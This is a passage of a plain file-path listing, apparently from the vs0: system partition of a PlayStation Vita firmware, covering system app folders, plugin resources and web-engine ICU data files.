vs0:app/NPXS10010/sce_sys/param.sfo
vs0:app/NPXS10010/sce_sys/pic0.png
vs0:app/NPXS10010/videobrowser_plugin.rco
vs0:app/NPXS10010/videoplayer_plugin.rco
vs0:app/NPXS10010/videoplayer_settings.xml
vs0:app/NPXS10012/eboot.bin
vs0:app/NPXS10012/remoteplay_plugin.rco
vs0:app/NPXS10012/sce_sys/icon0.png
vs0:app/NPXS10012/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10012/sce_sys/livearea/contents/comboplay.png
vs0:app/NPXS10012/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10012/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10012/sce_sys/param.sfo
vs0:app/NPXS10012/sce_sys/pic0.png
vs0:app/NPXS10013/eboot.bin
vs0:app/NPXS10013/gaikai-player.suprx
vs0:app/NPXS10013/json-configs/rp.json
vs0:app/NPXS10013/keymap/00/001.png
vs0:app/NPXS10013/keymap/01/001.png
vs0:app/NPXS10013/keymap/02/001.png
vs0:app/NPXS10013/keymap/03/001.png
vs0:app/NPXS10013/libSceSecondScreen.suprx
vs0:app/NPXS10013/resource/remoteplay_plugin.rco
vs0:app/NPXS10013/sce_sys/icon0.png
vs0:app/NPXS10013/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10013/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10013/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10013/sce_sys/param.sfo
vs0:app/NPXS10013/sce_sys/pic0.png
vs0:app/NPXS10013/second_screen.rco
vs0:app/NPXS10014/eboot.bin
vs0:app/NPXS10014/psn_mail_plugin.rco
vs0:app/NPXS10014/sce_sys/icon0.png
vs0:app/NPXS10014/sce_sys/livearea/contents/Messages_LA_bg.png
vs0:app/NPXS10014/sce_sys/livearea/contents/Messages_btn_LAReceivedMsg.png
vs0:app/NPXS10014/sce_sys/livearea/contents/Messages_gate.png
vs0:app/NPXS10014/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10014/sce_sys/param.sfo
vs0:app/NPXS10014/sce_sys/pic0.png
vs0:app/NPXS10015/bluetooth_settings_plugin.rco
vs0:app/NPXS10015/console_info_plugin.rco
vs0:app/NPXS10015/datetime_settings_plugin.rco
vs0:app/NPXS10015/debug_settings_plugin.rco
vs0:app/NPXS10015/eboot.bin
vs0:app/NPXS10015/idu_settings_plugin.rco
vs0:app/NPXS10015/language_settings_plugin.rco
vs0:app/NPXS10015/location_settings_plugin.rco
vs0:app/NPXS10015/network_settings_plugin.rco
vs0:app/NPXS10015/notification_settings_plugin.rco
vs0:app/NPXS10015/peripherals_settings_plugin.rco
vs0:app/NPXS10015/powersave_settings_plugin.rco
vs0:app/NPXS10015/psn_settings_plugin.rco
vs0:app/NPXS10015/reset_plugin.rco
vs0:app/NPXS10015/sce_sys/icon0.png
vs0:app/NPXS10015/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10015/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10015/sce_sys/livearea/contents/item_usersguide.png
vs0:app/NPXS10015/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10015/sce_sys/param.sfo
vs0:app/NPXS10015/sce_sys/pic0.png
vs0:app/NPXS10015/security_settings_plugin.rco
vs0:app/NPXS10015/sound_settings_plugin.rco
vs0:app/NPXS10015/system_settings_core.suprx
vs0:app/NPXS10015/system_settings_main.rco
vs0:app/NPXS10015/system_settings_plugin.rco
vs0:app/NPXS10015/system_update_plugin.rco
vs0:app/NPXS10015/telephony/tel_set_operator_profile.ini
vs0:app/NPXS10015/telephony_settings_plugin.rco
vs0:app/NPXS10015/theme_settings_plugin.rco
vs0:app/NPXS10015/wifi_settings_plugin.rco
vs0:app/NPXS10016/sce_sys/param.sfo
vs0:app/NPXS10017/eboot.bin
vs0:app/NPXS10017/jx_web_filtering.suprx
vs0:app/NPXS10017/lib/Plugins/silk_plugin.suprx
vs0:app/NPXS10017/sce_sys/param.sfo
vs0:app/NPXS10017/vita_jsextobj.suprx
vs0:app/NPXS10018/eboot.bin
vs0:app/NPXS10018/sce_sys/icon0.png
vs0:app/NPXS10018/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10018/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10018/sce_sys/param.sfo
vs0:app/NPXS10018/sce_sys/pic0.png
vs0:app/NPXS10018/signup_plugin.rco
vs0:app/NPXS10021/eboot.bin
vs0:app/NPXS10021/opco_icon/ca_telecom.png
vs0:app/NPXS10021/opco_icon/eu_telecom.png
vs0:app/NPXS10021/opco_icon/jp_telecom.png
vs0:app/NPXS10021/opco_icon/unknown.png
vs0:app/NPXS10021/opco_icon/us_telecom.png
vs0:app/NPXS10021/sce_sys/icon0.png
vs0:app/NPXS10021/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10021/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10021/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10021/sce_sys/param.sfo
vs0:app/NPXS10021/tel_reg.suprx
vs0:app/NPXS10021/tel_reg_main.rco
vs0:app/NPXS10021/tel_reg_plugin.rco
vs0:app/NPXS10023/eboot.bin
vs0:app/NPXS10023/sce_sys/param.sfo
vs0:app/NPXS10024/eboot.bin
vs0:app/NPXS10024/sce_sys/livearea/contents
vs0:app/NPXS10024/sce_sys/param.sfo
vs0:app/NPXS10025/eboot.bin
vs0:app/NPXS10025/sce_sys/livearea/contents
vs0:app/NPXS10025/sce_sys/param.sfo
vs0:app/NPXS10026/account_bind_plugin.rco
vs0:app/NPXS10026/eboot.bin
vs0:app/NPXS10026/host_select_plugin.rco
vs0:app/NPXS10026/resource.rco
vs0:app/NPXS10026/sce_sys/icon0.png
vs0:app/NPXS10026/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10026/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10026/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10026/sce_sys/param.sfo
vs0:app/NPXS10026/sce_sys/pic0.png
vs0:app/NPXS10027/eboot.bin
vs0:app/NPXS10027/game_manual_plugin.rco
vs0:app/NPXS10027/sce_sys/param.sfo
vs0:app/NPXS10027/sce_sys/pic0.png
vs0:app/NPXS10028/__sce_discinfo
vs0:app/NPXS10028/eboot.bin
vs0:app/NPXS10028/pcff.skprx
vs0:app/NPXS10028/sce_sys/param.sfo
vs0:app/NPXS10028/sce_sys/ps1_livearea/contents/bg0.png
vs0:app/NPXS10028/sce_sys/ps1_livearea/contents/pokesute_off.png
vs0:app/NPXS10028/sce_sys/ps1_livearea/contents/pokesute_on.png
vs0:app/NPXS10028/sce_sys/ps1_livearea/contents/ps1.png
vs0:app/NPXS10028/sce_sys/ps1_livearea/contents/template.xml
vs0:app/NPXS10028/sce_sys/psp_livearea/contents/bg0.png
vs0:app/NPXS10028/sce_sys/psp_livearea/contents/template.xml
vs0:app/NPXS10029/eboot.bin
vs0:app/NPXS10029/sce_sys/param.sfo
vs0:app/NPXS10031/eboot.bin
vs0:app/NPXS10031/sample_plugin.rco
vs0:app/NPXS10031/sce_sys/icon0.png
vs0:app/NPXS10031/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10031/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10031/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10031/sce_sys/param.sfo
vs0:app/NPXS10032/eboot.bin
vs0:app/NPXS10032/sce_sys/param.sfo
vs0:app/NPXS10035/sce_sys/param.sfo
vs0:app/NPXS10036/eboot.bin
vs0:app/NPXS10036/sce_sys/param.sfo
vs0:app/NPXS10037/eboot.bin
vs0:app/NPXS10037/jx_web_filtering.suprx
vs0:app/NPXS10037/lib/Plugins
vs0:app/NPXS10037/sce_sys/param.sfo
vs0:app/NPXS10037/vita_jsextobj.suprx
vs0:app/NPXS10040/sce_sys/icon0.png
vs0:app/NPXS10040/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10040/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10040/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10040/sce_sys/param.sfo
vs0:app/NPXS10040/sce_sys/pic0.png
vs0:app/NPXS10041/sce_sys/icon0.png
vs0:app/NPXS10041/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10041/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10041/sce_sys/livearea/contents/op_logo.png
vs0:app/NPXS10041/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10041/sce_sys/param.sfo
vs0:app/NPXS10041/sce_sys/pic0.png
vs0:app/NPXS10042/sce_sys/icon0.png
vs0:app/NPXS10042/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10042/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10042/sce_sys/livearea/contents/op_logo.png
vs0:app/NPXS10042/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10042/sce_sys/param.sfo
vs0:app/NPXS10042/sce_sys/pic0.png
vs0:app/NPXS10043/sce_sys/icon0.png
vs0:app/NPXS10043/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10043/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10043/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10043/sce_sys/param.sfo
vs0:app/NPXS10043/sce_sys/pic0.png
vs0:app/NPXS10044/sce_sys/icon0.png
vs0:app/NPXS10044/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10044/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10044/sce_sys/livearea/contents/frame1.png
vs0:app/NPXS10044/sce_sys/livearea/contents/frame2.png
vs0:app/NPXS10044/sce_sys/livearea/contents/frame3.png
vs0:app/NPXS10044/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10044/sce_sys/param.sfo
vs0:app/NPXS10044/sce_sys/pic0.png
vs0:app/NPXS10045/sce_sys/icon0.png
vs0:app/NPXS10045/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10045/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10045/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10045/sce_sys/param.sfo
vs0:app/NPXS10045/sce_sys/pic0.png
vs0:app/NPXS10060/sce_sys/icon0.png
vs0:app/NPXS10060/sce_sys/param.sfo
vs0:app/NPXS10063/eboot.bin
vs0:app/NPXS10063/grpmsg_middleware.rco
vs0:app/NPXS10063/sce_sys/livearea/contents
vs0:app/NPXS10063/sce_sys/param.sfo
vs0:app/NPXS10065/eboot.bin
vs0:app/NPXS10065/grief_report_dialog.suprx
vs0:app/NPXS10065/grief_report_dialog_bg_plugin.rco
vs0:app/NPXS10065/grief_report_dialog_general_plugin.rco
vs0:app/NPXS10065/grief_report_dialog_specific_plugin.rco
vs0:app/NPXS10065/sce_sys/param.sfo
vs0:app/NPXS10065/sce_sys/pic0.png
vs0:app/NPXS10072/eboot.bin
vs0:app/NPXS10072/email_edit_preview_plugin.rco
vs0:app/NPXS10072/email_engine.suprx
vs0:app/NPXS10072/email_first_plugin.rco
vs0:app/NPXS10072/email_plugin.rco
vs0:app/NPXS10072/email_settings_plugin.rco
vs0:app/NPXS10072/email_view_plugin.rco
vs0:app/NPXS10072/sce_sys/icon0.png
vs0:app/NPXS10072/sce_sys/livearea/contents/Email_LA_bg.png
vs0:app/NPXS10072/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10072/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10072/sce_sys/param.sfo
vs0:app/NPXS10072/sce_sys/pic0.png
vs0:app/NPXS10073/eboot.bin
vs0:app/NPXS10073/email_bg_plugin.rco
vs0:app/NPXS10073/sce_sys/param.sfo
vs0:app/NPXS10077/crash_report.rco
vs0:app/NPXS10077/eboot.bin
vs0:app/NPXS10077/sce_sys/param.sfo
vs0:app/NPXS10078/comboplay_plugin.rco
vs0:app/NPXS10078/eboot.bin
vs0:app/NPXS10078/sce_sys/icon0.png
vs0:app/NPXS10078/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10078/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10078/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10078/sce_sys/param.sfo
vs0:app/NPXS10078/sce_sys/pic0.png
vs0:app/NPXS10079/dailychecker_bg.rco
vs0:app/NPXS10079/eboot.bin
vs0:app/NPXS10079/sce_sys/param.sfo
vs0:app/NPXS10080/eboot.bin
vs0:app/NPXS10080/sce_sys/livearea/contents
vs0:app/NPXS10080/sce_sys/param.sfo
vs0:app/NPXS10081/eboot.bin
vs0:app/NPXS10081/psm_manual_plugin.rco
vs0:app/NPXS10081/sce_sys/param.sfo
vs0:app/NPXS10081/sce_sys/pic0.png
vs0:app/NPXS10082/sce_sys/param.sfo
vs0:app/NPXS10082/spawn.self
vs0:app/NPXS10083/eboot.bin
vs0:app/NPXS10083/sce_sys/param.sfo
vs0:app/NPXS10084/eboot.bin
vs0:app/NPXS10084/sce_sys/param.sfo
vs0:app/NPXS10085/eboot.bin
vs0:app/NPXS10085/sce_sys/param.sfo
vs0:app/NPXS10085/sce_sys/pic0.png
vs0:app/NPXS10085/videoplayer_plugin.rco
vs0:app/NPXS10085/videoplayer_settings.xml
vs0:app/NPXS10090/sce_sys/param.sfo
vs0:app/NPXS10091/calendar_plugin.rco
vs0:app/NPXS10091/eboot.bin
vs0:app/NPXS10091/sce_sys/icon0.png
vs0:app/NPXS10091/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10091/sce_sys/livearea/contents/cal_livearea_list_bg.gim
vs0:app/NPXS10091/sce_sys/livearea/contents/cal_livearea_recommend.gim
vs0:app/NPXS10091/sce_sys/livearea/contents/cal_livearea_recommend_new.gim
vs0:app/NPXS10091/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10091/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10091/sce_sys/param.sfo
vs0:app/NPXS10091/sce_sys/pic0.png
vs0:app/NPXS10091/sce_sys/ringtone.mp3
vs0:app/NPXS10092/calendar_bg_plugin.rco
vs0:app/NPXS10092/eboot.bin
vs0:app/NPXS10092/sce_sys/param.sfo
vs0:app/NPXS10093/sce_sys/icon0.png
vs0:app/NPXS10093/sce_sys/livearea/contents/bg.png
vs0:app/NPXS10093/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10093/sce_sys/param.sfo
vs0:app/NPXS10094/eboot.bin
vs0:app/NPXS10094/kids_app_plugin.rco
vs0:app/NPXS10094/sce_sys/icon0.png
vs0:app/NPXS10094/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10094/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10094/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10094/sce_sys/param.sfo
vs0:app/NPXS10094/sce_sys/pic0.png
vs0:app/NPXS10095/eboot.bin
vs0:app/NPXS10095/panorama_plugin.rco
vs0:app/NPXS10095/sce_sys/icon0.png
vs0:app/NPXS10095/sce_sys/livearea/contents
vs0:app/NPXS10095/sce_sys/param.sfo
vs0:app/NPXS10095/sce_sys/pic0.png
vs0:app/NPXS10098/eboot.bin
vs0:app/NPXS10098/gaikai-player.suprx
vs0:app/NPXS10098/json-configs/rp.json
vs0:app/NPXS10098/json-configs/rp_720p.json
vs0:app/NPXS10098/resource/remoteplay_plugin.rco
vs0:app/NPXS10098/sce_sys/icon0.png
vs0:app/NPXS10098/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10098/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10098/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10098/sce_sys/param.sfo
vs0:app/NPXS10098/sce_sys/pic0.png
vs0:app/NPXS10100/eboot.bin
vs0:app/NPXS10100/sce_sys/param.sfo
vs0:app/NPXS10101/eboot.bin
vs0:app/NPXS10101/sce_sys/param.sfo
vs0:app/NPXS10916/MainView.rco
vs0:app/NPXS10916/eboot.bin
vs0:app/NPXS10916/sce_sys/icon0.png
vs0:app/NPXS10916/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10916/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10916/sce_sys/param.sfo
vs0:data/external/app/default/sce_sys/livearea/contents
vs0:data/external/app/friends/sce_sys/livearea
vs0:data/external/app/signup/sce_sys/livearea/contents
vs0:data/external/app/webbrowser
vs0:data/external/cdlg/calendar_review_dialog_plugin.rco
vs0:data/external/cdlg/cameraimport_dialog_plugin.rco
vs0:data/external/cdlg/companion_dialog_plugin.rco
vs0:data/external/cdlg/compat_dialog_plugin.rco
vs0:data/external/cdlg/contacts_list_plugin.rco
vs0:data/external/cdlg/contacts_near_plugin.rco
vs0:data/external/cdlg/contacts_pa_plugin.rco
vs0:data/external/cdlg/cross_controller_dialog_plugin.rco
vs0:data/external/cdlg/fb_dialog_plugin.rco
vs0:data/external/cdlg/friend_profile_plugin.rco
vs0:data/external/cdlg/friend_select_plugin.rco
vs0:data/external/cdlg/friendlist_dialog_plugin.rco
vs0:data/external/cdlg/game_custom_data_dialog_impl_plugin.rco
vs0:data/external/cdlg/ime_dialog_plugin.rco
vs0:data/external/cdlg/invitation_dialog_impl_plugin.rco
vs0:data/external/cdlg/mailer_address_plugin.rco
vs0:data/external/cdlg/msg_dialog_plugin.rco
vs0:data/external/cdlg/near_dialog_plugin.rco
vs0:data/external/cdlg/netcheck_plugin.rco
vs0:data/external/cdlg/np_message_dialog_impl_plugin.rco
vs0:data/external/cdlg/np_sns_fb_dialog_plugin.rco
vs0:data/external/cdlg/np_trophy_setup_dialog_plugin.rco
vs0:data/external/cdlg/npeula_dialog_plugin.rco
vs0:data/external/cdlg/npprofile_dialog_plugin.rco
vs0:data/external/cdlg/party_member_list_plugin.rco
vs0:data/external/cdlg/patch_chk_plugin.rco
vs0:data/external/cdlg/photoimport_dialog_plugin.rco
vs0:data/external/cdlg/photoreview_dialog_plugin.rco
vs0:data/external/cdlg/pocketstation_dialog_plugin.rco
vs0:data/external/cdlg/remote_osk_dialog_plugin.rco
vs0:data/external/cdlg/savedata_dialog_plugin.rco
vs0:data/external/cdlg/signin_ext_plugin.rco
vs0:data/external/cdlg/signin_plugin.rco
vs0:data/external/cdlg/store_checkout_dialog_plugin.rco
vs0:data/external/cdlg/store_checkout_plugin.rco
vs0:data/external/cdlg/sysupchk_plugin.rco
vs0:data/external/cdlg/tw_login_dialog_plugin.rco
vs0:data/external/cdlg/twitter_dialog_plugin.rco
vs0:data/external/cdlg/web_ui_plugin.rco
vs0:data/external/cert/CA_LIST.cer
vs0:data/external/common/common_resource.rco
vs0:data/external/font/emoji/imagefont.bin
vs0:data/external/font/pvf/c041056ts.ttf
vs0:data/external/font/pvf/d013013ds.ttf
vs0:data/external/font/pvf/e046323ms.ttf
vs0:data/external/font/pvf/e046323ts.ttf
vs0:data/external/font/pvf/k006004ds.ttf
vs0:data/external/font/pvf/n023055ms.ttf
vs0:data/external/font/pvf/n023055ts.ttf
vs0:data/external/grpmsg
vs0:data/external/psm
vs0:data/external/web/data/fonts
vs0:data/external/web/data/icu/icudt40l/brkitr
vs0:data/external/web/data/icu/icudt40l/coll
vs0:data/external/web/etc
vs0:data/external/web/lib/Plugins
vs0:data/external/webcore/SceHafnium.suprx
vs0:data/external/webcore/ScePsp2Compat.suprx
vs0:data/external/webcore/SceWebKitModule.suprx
vs0:data/external/webcore/data/CEFramework.bin
vs0:data/external/webcore/data/CEHtmlApi.bin
vs0:data/external/webcore/data/CEHtmlUI.bin
vs0:data/external/webcore/data/fonts
vs0:data/external/webcore/data/icu/icudt40l/brkitr/char.brk
vs0:data/external/webcore/data/icu/icudt40l/brkitr/en.res
vs0:data/external/webcore/data/icu/icudt40l/brkitr/en_US.res
vs0:data/external/webcore/data/icu/icudt40l/brkitr/en_US_POSIX.res
vs0:data/external/webcore/data/icu/icudt40l/brkitr/ja.res
vs0:data/external/webcore/data/icu/icudt40l/brkitr/line.brk
vs0:data/external/webcore/data/icu/icudt40l/brkitr/res_index.res
vs0:data/external/webcore/data/icu/icudt40l/brkitr/root.res
vs0:data/external/webcore/data/icu/icudt40l/brkitr/sent.brk
vs0:data/external/webcore/data/icu/icudt40l/brkitr/title.brk
vs0:data/external/webcore/data/icu/icudt40l/brkitr/word.brk
vs0:data/external/webcore/data/icu/icudt40l/brkitr/word_POSIX.brk
vs0:data/external/webcore/data/icu/icudt40l/brkitr/word_ja.brk
vs0:data/external/webcore/data/icu/icudt40l/cns-11643-1992.cnv
vs0:data/external/webcore/data/icu/icudt40l/cnvalias.icu
vs0:data/external/webcore/data/icu/icudt40l/coll/root.res
vs0:data/external/webcore/data/icu/icudt40l/ebcdic-xml-us.cnv
vs0:data/external/webcore/data/icu/icudt40l/gb18030.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1006_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1025_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1026_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1047_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1051_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1089_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1097_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1098_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1112_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1122_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1123_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1124_P100-1996.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1125_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1129_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1130_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1131_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1132_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1133_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1137_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1140_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1141_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1142_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1143_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1144_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1145_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1146_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1147_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1148_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1149_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1153_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1154_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1155_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1156_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1157_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1158_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1160_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1162_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1164_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1168_P100-2002.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1250_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1251_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1252_P100-2000.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1253_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1254_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1255_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1256_P110-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1257_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1258_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-12712_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1276_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1363_P110-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1363_P11B-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1364_P110-2007.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1371_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1373_P100-2002.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1375_P100-2007.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1383_P110-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1386_P100-2001.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1388_P103-2001.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1390_P110-2003.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-1399_P110-2003.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-16684_P110-2003.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-16804_X110-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-273_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-277_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-278_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-280_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-284_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-285_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-290_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-297_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-33722_P120-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-33722_P12A_P12A-2004_U2.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-37_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-420_X120-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-424_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-437_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-4517_P100-2005.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-4899_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-4909_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-4971_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-500_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5012_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5123_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5346_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5347_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5348_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5349_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5350_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5351_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5352_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5353_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5354_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5471_P100-2006.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-5478_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-720_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-737_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-775_P100-1996.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-803_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-813_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-838_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-8482_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-850_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-851_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-852_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-855_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-856_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-857_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-858_P100-1997.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-860_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-861_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-862_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-863_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-864_X110-1999.cnv
